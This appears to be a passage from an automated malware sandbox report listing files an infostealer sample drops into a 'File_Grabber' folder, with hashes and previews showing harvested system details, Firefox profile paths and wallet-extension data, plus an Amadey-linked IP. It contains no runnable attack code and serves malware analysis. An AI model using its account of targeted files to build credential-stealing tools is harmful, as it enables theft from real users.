	tOuVwTJrau.exe	Get hash	malicious	Amadey	Browse	185.81.68.148

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:Dy:W
MD5:	34BD1DFB9F72CF4F86E6DF6DA0A9E49A
SHA1:	5F96D66F33C81C0B10DF2128D3860E3CB7E89563
SHA-256:	8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C
SHA-512:	E3787DE7C4BC70CA62234D9A4CDC6BD665BFFA66DEBE3851EE3E8E49E7498B9F1CBC01294BF5E9F75DE13FB78D05879E82FA4B89EE45623FE5BF7AC7E48EDA96
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0.1..

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\0.2.filtertrie.intermediate.txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:Ay:Ay
MD5:	C204E9FAAF8565AD333828BEFF2D786E
SHA1:	7D23864F5E2A12C1A5F93B555D2D3E7C8F78EEC1
SHA-256:	D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F
SHA-512:	E72F4F79A4AE2E5E40A41B322BC0408A6DEC282F90E01E0A8AAEDF9FB9D6F04A60F45A844595727539C1643328E9C1B989B90785271CC30A6550BBDA6B1909F8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0.2..

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\1-7FeatureCache.txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	764
Entropy (8bit):	2.71278771083604
Encrypted:	false
SSDEEP:	12:YIrxA3rOpKmA4RP7EcJBSiGl6s8A6yZn2KKrn2U3QPZRpX5Cwo5WHWn:YIrcSpKmNRwcfHGF8AJp9WtAZRJ5poI2
MD5:	3E059D830158FF4A28F904D1CF0DBE84
SHA1:	B5FC22017FA5BBE4728A93CFC27F8300EEAE310F
SHA-256:	33FACD9836FDB30E3916C74E1AFCBD7A3A209D65F2B5BCF3FD81C7585047C196
SHA-512:	1AC6CC78050CFC70EE9A0A46D11EA0F21262036A3359E3BED28D4F3967C9449EA5B8872CC4477E7517BF06B8CD814EB30C0CE5B5F5A32B4970C0E4CDF63FE3BD
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.1.2.5.,.2.5.5.0.5.0.8.8.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.7.4.6.3.7.8.,.3.2.9.4.5.8.7.9.9.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\AlternateServices.txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	154
Entropy (8bit):	4.632246241243701
Encrypted:	false
SSDEEP:	3:N8FZHgidIuj+0WT80ZHgidIu9JgidIurcVSvlYuzXLZM:27HgidpZWT8yHgidBgidxcVStlXLZM
MD5:	C05DE5103FBCEFB5C5A947D4EDC2E05B
SHA1:	46758D7F19C6996A42BF55DCD522370C29A7F7DD
SHA-256:	89FE6A6923D7B4F1F5B9A83D7ECD49A5C650084E4666768F1EB43DEE4113759A
SHA-512:	1D5544A54A1748A374410269FDD3C380B019190537FDC564B307BE35CA3DD787FCAD29AAD1458A9EB007C6A1CA55A8ED70F9049E0204EED02C887C52EA523687
Malicious:	false
Reputation:	low
Preview:	https:push.services.mozilla.com:443:.::3.0.19635.https:push.services.mozilla.com:443:push.services.mozilla.com:443::n:1699078835:h3:y:1696486833:n::\|n:y:.

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\Latest.dat

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\ProcessMAU[1].txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	455831477B82574F6BF871193F2F761D
SHA1:	F44217A81173869E08671753C52553646FF5D95B
SHA-256:	69BF0BC46F51B33377C4F3D92CAF876714F6BBBE99E7544487327920873F9820
SHA-512:	CBC0EE58E447428BDCF72FC8B03C8CFB086EDBB14205B918E75EBEFF1D85FF1DD254E9DCB387AFBD3FA766C803937C306E0A2A79870C0D87ABCB7AB93661CF85
Malicious:	false
Preview:	****

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\Rdr[1].txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	455831477B82574F6BF871193F2F761D
SHA1:	F44217A81173869E08671753C52553646FF5D95B
SHA-256:	69BF0BC46F51B33377C4F3D92CAF876714F6BBBE99E7544487327920873F9820
SHA-512:	CBC0EE58E447428BDCF72FC8B03C8CFB086EDBB14205B918E75EBEFF1D85FF1DD254E9DCB387AFBD3FA766C803937C306E0A2A79870C0D87ABCB7AB93661CF85
Malicious:	false
Preview:	****

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\ReportOwner[1].txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	455831477B82574F6BF871193F2F761D
SHA1:	F44217A81173869E08671753C52553646FF5D95B
SHA-256:	69BF0BC46F51B33377C4F3D92CAF876714F6BBBE99E7544487327920873F9820
SHA-512:	CBC0EE58E447428BDCF72FC8B03C8CFB086EDBB14205B918E75EBEFF1D85FF1DD254E9DCB387AFBD3FA766C803937C306E0A2A79870C0D87ABCB7AB93661CF85
Malicious:	false
Preview:	****

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\SiteSecurityServiceState.txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	450
Entropy (8bit):	4.936435289733623
Encrypted:	false
SSDEEP:	12:eHXB3IyZQF3IrgQF3IW9QryZRJBXB3IWR5WqcQZ/cKlZL5wyZ3KrocQF3Iw:eHx3pw33w3r4yZRJBx3F3VcMjCyZ3KLa
MD5:	C21038C2453AB5E61624F10D7F08A4E6
SHA1:	D080349C4447DD6492069E74A3CB8710DFF7439B
SHA-256:	4232595847050D63E92EBB0D81D5F512EA511B87349538483FF7CBAB6C0E0986
SHA-512:	B0241336B624051AF16C5FC454124E09E1051E8ECE33E7F50E8A573EF094F9EC6B46550AFE4A42DAFE870CE881EFF72EFC6739E0CEA0BE19DB8C14E85EBBCCD7
Malicious:	false
Preview:	aus5.mozilla.org.0.19635.1728022834935,1,0.contile.services.mozilla.com.0.19635.1728022834480,1,0.location.services.mozilla.com.0.19635.1728022834317,1,1.incoming.telemetry.mozilla.org.0.19635.1728022834518,1,0.spocs.getpocket.com.0.19635.1759558835101,1,0.shavar.services.mozilla.com^firstPartyDomain=safebrowsing.86868755-6b82-4842-b301-72671a0db32e.mozilla.0.19635.1728022835060,1,1.firefox.settings.services.mozilla.com.0.19635.1728022834587,1,0.

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\System_info.txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	353
Entropy (8bit):	5.335570770643404
Encrypted:	false
SSDEEP:	6:muemWElnXFbRNLQqwBEoNN2RmU9mVW2yUiQPMVWK/lAAAB6nglCGyA2l5:demW8nXFFNLQqwBEoP2d9YW210VWKNA6
MD5:	F537D7FC77C78DACC8356BDA2198E4FE
SHA1:	655A59923574DD7C0C1AD8D3392306015179BFD3
SHA-256:	56657BCBA98EB60B1666075544688D8241930F4950CDC0034E71A2C8A5B6C309
SHA-512:	2BA15EEC91063EBAE860CAD2BED3DFEC9AD53C2005E65C365EFFFD75421F8D78F08F45ABB0B45B813313B6CAB90B374FE188C1667660651595A14DBA2B9E2E4C
Malicious:	false
Preview:	User Name: user..Computer Name: 226533..HWID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..Windows Version: 6.2..Install Path: C:\Users\user\Desktop\CwQQqCmqkY.exe..Processor Architecture: 9..Page Size: 4096..Number of Processors: 4..Processor Type: 8664..RAM Size: 8191 MB..Screen Resolution: 1280 x 1024..System Language: en..BIOS Version: P......

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\hub-signature.txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	ASCII text, with very long lines (975), with no line terminators
Category:	dropped
Size (bytes):	975
Entropy (8bit):	5.761205683904012
Encrypted:	false
SSDEEP:	24:UfDTQedu+/O7dZkNhFCzgQxDLM8x1OJNl/foKuehOcC:U7TQedu+/O7dZFgMDOJNFPhOD
MD5:	DB7C7DCA873D7D732E570B272B16FA17
SHA1:	4A26E57A5C88663F8135F17537DD8AC0597F005B
SHA-256:	539D7F4F275098780B3CBB100210F1C7912B7C7BE384BCDAB57C2FE3DB027EDD
SHA-512:	A2F9B789ECD61F4AAE7A54F5F7E94701D347D20FC073066716D8F5EBAFC534194370109EA5057C2AC69426C8B0C50698415ED372BCBDAA432B37F25499688306
Malicious:	false
Preview:	eyJhcHAtc2V0dXAuanMiOiJQbjRNZDJISEVHT2EyOUV3Ym43RzJHT0FPWU1jdDVLQnc4aGU2TjNBSG00PSIsImNyeXB0by5idW5kbGUuanMiOiJYNjU2R29UZ0dKVko5VVZZMVFWaW9rVGIrOW9Oako4TGtlaU1MRGFZL3FNPSIsImxvYWQtaHViLWkxOG4uYnVuZGxlLmpzIjoidUpZUHBpanhuaVJBVGs3NmJWdzltWmYzUGFQWldtNnAzc0hxczAwRWY0WT0iLCJtYW5pZmVzdC53ZWJhcHAuanNvbiI6IkJ3ZHV5NkNsdUsvR09icUJvNjRkOEpTcTFPOEZXTzlVeUdieTF0cktRRTA9IiwicnVudGltZS5idW5kbGUuanMiOiJTUEVFL3ExcWxRaHQ1TG44bEs5YzIzdG9CQ1FyNTNtandKY2VuejFkOHFZPSIsInZlbmRvci5idW5kbGUuanMiOiJJVHNycXcwK1hsK0NNUGMyL0QvbnFER21vWjk2WVl0bC9ta29kR0Z4aXNNPSIsIndhbGxldC1jcnlwdG8uaHRtbCI6ImpLYlVHa2ZzZkVmWkpEYyt0N1lTdGE0QnpycE00cFIwSjlsOGVndzBYTGs9Iiwid2FsbGV0LWljb24uc3ZnIjoiVVlpSy9zR1dWSUpPakVvQ2srWkRHZUxXMzFsRURUemlDSGU2d3RaQVRaQT0iLCJ3YWxsZXQuYnVuZGxlLmpzIjoiVlo3RnhzNVIvZHVEMXJNMGdPUi9hay80VDJ4QXgxbHh5RkwrREVkV1hXOD0iLCJ3YWxsZXQuaHRtbCI6Ik1uTG9oU08vcTVzMkVuWGEzdFhSK0FrRHhycUFUdWQwaXZYN1lydHYwTFE9In0=.e2mRaJdMQuCKD+0Cwj5huurciWFUB/NShsVDvZajZxaIedT58EsvbiD8lZcA6fn1Y2oG2vgt3D+OaaeXPlT7sw

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_1280.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:5l:7
MD5:	2DD3F3C33E7100EC0D4DBBCA9774B044
SHA1:	B254D47F2B9769F13B033CAE2B0571D68D42E5EB
SHA-256:	5A00CC998E0D0285B729964AFD20618CBAECFA7791FECDB843B535491A83AE21
SHA-512:	C719D8C54A3A749A41B8FC430405DB7FCDE829C150F27C89015793CA06018AD9D6833F20AB7E0CFDA99E16322B52A19C080E8C618F996FC8923488819E6E14BB
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_1920.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:A/lll:A/
MD5:	635E15CB045FF4CF0E6A31C827225767
SHA1:	F1EAAA628678441481309261FABC9D155C0DD6CB
SHA-256:	67219E5AD98A31E8FA8593323CD2024C1CA54D65985D895E8830AE356C7BDF1D
SHA-512:	81172AE72153B24391C19556982A316E16E638F5322B11569D76B28E154250D0D2F31E83E9E832180E34ADD0D63B24D36DD8A0CEE80E8B46D96639BFF811FA58
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_2560.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:lX:1
MD5:	2D84AD5CFDF57BD4E3656BCFD9A864EA
SHA1:	B7B82E72891E16D837A54F94960F9B3C83DC5552
SHA-256:	D241584A3FD4A91976FAFD5EC427E88F6E60998954DEC39E388AF88316AF3552
SHA-512:	0D9BC1EE51A4FB91B24E37F85AFBF88376C88345483D686C6CFF84066544287C98534AA701D7D4D52E53F10A3BEA73EE8BC38D18425FDE6D66352F8B76C0CBB5
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_768.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:Wtl:WX
MD5:	D192F7C343602D02E3E020807707006E
SHA1:	82259C6CB5B1F31CC2079A083BC93C726BFC4FBF
SHA-256:	BB4D233C90BDBEE6EF83E40BFF1149EA884EFA790B3BEF496164DF6F90297C48
SHA-512:	AEC90CF52646B5B0EF00CEB2A8D739BEFE456D08551C031E8DEC6E1F549A6535C1870ADB62EEC0A292787AE6A7876388DD1B2C884CBA8CC6E2D7993790102F43
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_96.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:s:s
MD5:	2A8875D2AF46255DB8324AAD9687D0B7
SHA1:	7A066FA7B69FB5450C26A1718B79AD27A9021CA9
SHA-256:	54097CCCAE0CFCE5608466BA5A5CA2A3DFEAC536964EEC532540F3B837F5A7C7
SHA-512:	2C39F05A4DFFD30800BB7FBB3FF2018CF4CC96398460B7492F05CE6AFD59079FD6E3EB7C4F8384A35A954A22B4934C162A38534AD76CFB2FD772BCF10E211F7C
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_custom_stream.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:a/l/:e/
MD5:	F732BF1006B6529CFFBA2B9F50C4B07F
SHA1:	D3E8D4AF812BBC4F4013C53C4FFAB992D1D714E3
SHA-256:	77739084A27CB320F208AC1927D3D9C3CAC42748DBDF6229684EF18352D95067
SHA-512:	064D56217AEB2980A3BFAA1E252404613624D600C3A08B5CF0ADCB259596A1C60EE903FDC2650972785E5AE9B7B51890DED01EC4DA7B4DE94EBDA08AEAF662DF
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_exif.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:EX:EX
MD5:	FC94FE7BD3975E75CEFAD79F5908F7B3
SHA1:	78E7DA8D08E8898E956521D3B1BABBF6524E1DCA
SHA-256:	EE1ED3B49720B22D5FDA63D3C46D62A96CA8838C76AB2D2F580B1E7745521AA5
SHA-512:	4CEAF9021B30734F4CE8B4D4A057539472E68C0ADD199CF9C3D1C1C95320DA3884CAF46943FC9F7281607AB7FA6476027860EBED8BBAA9C44B3F4056B5E074D3
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_sr.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:6:6
MD5:	379523B9F5D5B954E719B664846DBF8F
SHA1:	930823EC80B85EDD22BAF555CAD21CDF48F066AA
SHA-256:	3C9002CAEDF0C007134A7E632C72588945A4892B6D7AD3977224A6A5A7457BF4
SHA-512:	ECA44DE86BBC3309FA6EAB400154D123DCD97DC1DB79554CE58CE2426854197E2365F5EEE42BAC6E6E9455561B206F592E159EF82FAF229212864894E6021E98
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_wide.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:V/l/:/
MD5:	5F243BF7CC0A348B6D31460A91173E71
SHA1:	5696B34625F027EC01765FC2BE49EFCFD882BF8E
SHA-256:	1B1AED169F2ACFAE4CF230701BDA91229CB582FF2CE29A413C5B8FE3B890D289
SHA-512:	9E08DFBBF20668B86DF696A0D5969E04E6EE4A67E997FF392099BC7FF184B1B8965502215744BE7FE423668B69099242BBA54DF3F0BFE4E70ACDC7CAD8195B02
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\iconcache_wide_alternate.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:J:J
MD5:	DB7C049E5E4E336D76D5A744C28C54C8
SHA1:	A4DB9C8586B9E4FA24416EB0D00F06A9EBD16B02
SHA-256:	E8830E7AC4088CF3DD464CAEC33A0035D966A7DE5AE4EFC3580D59A41916FF7B
SHA-512:	B614037FB1C7D19D704BF15F355672114D25080223E7EE4424AD2CB7B89782219E7877B373BBC7FA44F3AD8DF8A27EEF4E8CCC765D44EC02A61E3B7FAE88AE69
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\miniwallet.bundle.js.LICENSE.txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	295
Entropy (8bit):	4.7070549789727645
Encrypted:	false
SSDEEP:	6:U03WiGjs/TdMK1OmFsZ1FD+Dm3Jue9DOFTTgGHYVov10:U3kTHwmiCD6JuoqIfov10
MD5:	9FADCDA30B07120E2CB70B5A003ACFF9
SHA1:	A4EB198C6AE011CFB495A25D7C04B62FDD1D0346
SHA-256:	63EC623C2BDA74FC3E3D2796151FFE93255E8BD76B2D8BDFE2EA0B401848B15F
SHA-512:	E34A8BCE98AC7EEEB3416A9D2E8F331181A25E06467AA211AF4A12A88CEF0C5B2678792D03378F888C212EFF6340647AC99F97AA2CADB75C3777527FDDF77552
Malicious:	false
Preview:	/.object-assign.(c) Sindre Sorhus.@license MIT./../** @license React v16.14.0. * react.production.min.js. . Copyright (c) Facebook, Inc. and its affiliates.. . This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\notification_fast.bundle.js.LICENSE.txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	295
Entropy (8bit):	4.7070549789727645
Encrypted:	false
SSDEEP:	6:U03WiGjs/TdMK1OmFsZ1FD+Dm3Jue9DOFTTgGHYVov10:U3kTHwmiCD6JuoqIfov10
MD5:	9FADCDA30B07120E2CB70B5A003ACFF9
SHA1:	A4EB198C6AE011CFB495A25D7C04B62FDD1D0346
SHA-256:	63EC623C2BDA74FC3E3D2796151FFE93255E8BD76B2D8BDFE2EA0B401848B15F
SHA-512:	E34A8BCE98AC7EEEB3416A9D2E8F331181A25E06467AA211AF4A12A88CEF0C5B2678792D03378F888C212EFF6340647AC99F97AA2CADB75C3777527FDDF77552
Malicious:	false
Preview:	/.object-assign.(c) Sindre Sorhus.@license MIT./../** @license React v16.14.0. * react.production.min.js. . Copyright (c) Facebook, Inc. and its affiliates.. . This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\pkcs11.txt

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.354445655339239
Encrypted:	false
SSDEEP:	12:T4Lwvf1YudhJfBQ682LDcGuyXkvsUvE+LK5H4ll:T4Lwvf1ZDf6zHVG2D
MD5:	1FF5A4CB501B8C02AF9A0543E20815E7
SHA1:	EA922F09E197350B3B63FBD2C818221E8CC46D9C
SHA-256:	3A79D28C79B02A38BA65D34D936C82CCA74A5C690E383A29C94EC9A27A3190CE
SHA-512:	4942A867AB0B21BD19A2D296FA7F08C595C22E2717E8039E7A18FF9EADA60E6DFB455E28FC525A303A5BB5E72608B27AC8F77EE2C52A454EB3493E5D60F0F395
Malicious:	false
Preview:	library=..name=NSS Internal PKCS #11 Module..parameters=configdir='sql:C:\\Users\\user\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\2o7hffxt.default-release' certPrefix='' keyPrefix='' secmod='secmod.db' flags=optimizeSpace updatedir='' updateCertPrefix='' updateKeyPrefix='' updateid='' updateTokenDescription='' ..NSS=Flags=internal,critical trustOrder=75 cipherOrder=100 slotParams=(1={slotFlags=[ECC,RSA,DSA,DH,RC2,RC4,DES,RANDOM,SHA1,MD5,MD2,SSL,TLS,AES,Camellia,SEED,SHA256,SHA512] askpw=any timeout=30})....

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\settings.dat

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.105637406271287
Encrypted:	false
SSDEEP:	3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHglt:o1cUh4Y3LbO/BVsJDbYuDRBOyc/
MD5:	DC41CF25F0BDDA3ABA274B6BC64147DC
SHA1:	9F4D1379C944E6FC2FB912B89527193E1E1F4177
SHA-256:	8A190FE3DDBCF216F41A690A55DF92576D410F050818FFB476125A4EC6CF52ED
SHA-512:	91481621424973E0B4340ADE1B84402B24FE9F705A63D7044DD0B7BBC416E27F22684F4AB39EC4C7C8A13829A07BBA8B9B1576E820D23424804C0DE837F0FB17
Malicious:	false
Preview:	sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\throttle_store.dat

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.6219280948873624
Encrypted:	false
SSDEEP:	3:8g6Vvn:8g6Vv
MD5:	9E4E94633B73F4A7680240A0FFD6CD2C
SHA1:	E68E02453CE22736169A56FDB59043D33668368F
SHA-256:	41C91A9C93D76295746A149DCE7EBB3B9EE2CB551D84365FFF108E59A61CC304
SHA-512:	193011A756B2368956C71A9A3AE8BC9537D99F52218F124B2E64545EEB5227861D372639052B74D0DD956CB33CA72A9107E069F1EF332B9645044849D14AF337
Malicious:	false
Preview:	level=none expiry=0.

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\thumbcache_1280.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:5l:7
MD5:	2DD3F3C33E7100EC0D4DBBCA9774B044
SHA1:	B254D47F2B9769F13B033CAE2B0571D68D42E5EB
SHA-256:	5A00CC998E0D0285B729964AFD20618CBAECFA7791FECDB843B535491A83AE21
SHA-512:	C719D8C54A3A749A41B8FC430405DB7FCDE829C150F27C89015793CA06018AD9D6833F20AB7E0CFDA99E16322B52A19C080E8C618F996FC8923488819E6E14BB
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\thumbcache_1920.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:A/lll:A/
MD5:	635E15CB045FF4CF0E6A31C827225767
SHA1:	F1EAAA628678441481309261FABC9D155C0DD6CB
SHA-256:	67219E5AD98A31E8FA8593323CD2024C1CA54D65985D895E8830AE356C7BDF1D
SHA-512:	81172AE72153B24391C19556982A316E16E638F5322B11569D76B28E154250D0D2F31E83E9E832180E34ADD0D63B24D36DD8A0CEE80E8B46D96639BFF811FA58
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\thumbcache_2560.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:lX:1
MD5:	2D84AD5CFDF57BD4E3656BCFD9A864EA
SHA1:	B7B82E72891E16D837A54F94960F9B3C83DC5552
SHA-256:	D241584A3FD4A91976FAFD5EC427E88F6E60998954DEC39E388AF88316AF3552
SHA-512:	0D9BC1EE51A4FB91B24E37F85AFBF88376C88345483D686C6CFF84066544287C98534AA701D7D4D52E53F10A3BEA73EE8BC38D18425FDE6D66352F8B76C0CBB5
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\thumbcache_768.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	1.6368421881310118
Encrypted:	false
SSDEEP:	3:Wtl:WX
MD5:	D192F7C343602D02E3E020807707006E
SHA1:	82259C6CB5B1F31CC2079A083BC93C726BFC4FBF
SHA-256:	BB4D233C90BDBEE6EF83E40BFF1149EA884EFA790B3BEF496164DF6F90297C48
SHA-512:	AEC90CF52646B5B0EF00CEB2A8D739BEFE456D08551C031E8DEC6E1F549A6535C1870ADB62EEC0A292787AE6A7876388DD1B2C884CBA8CC6E2D7993790102F43
Malicious:	false
Preview:	CMMM ...................

C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\thumbcache_custom_stream.db

Download File

Process:	C:\Users\user\Desktop\CwQQqCmqkY.exe
File Type:	data
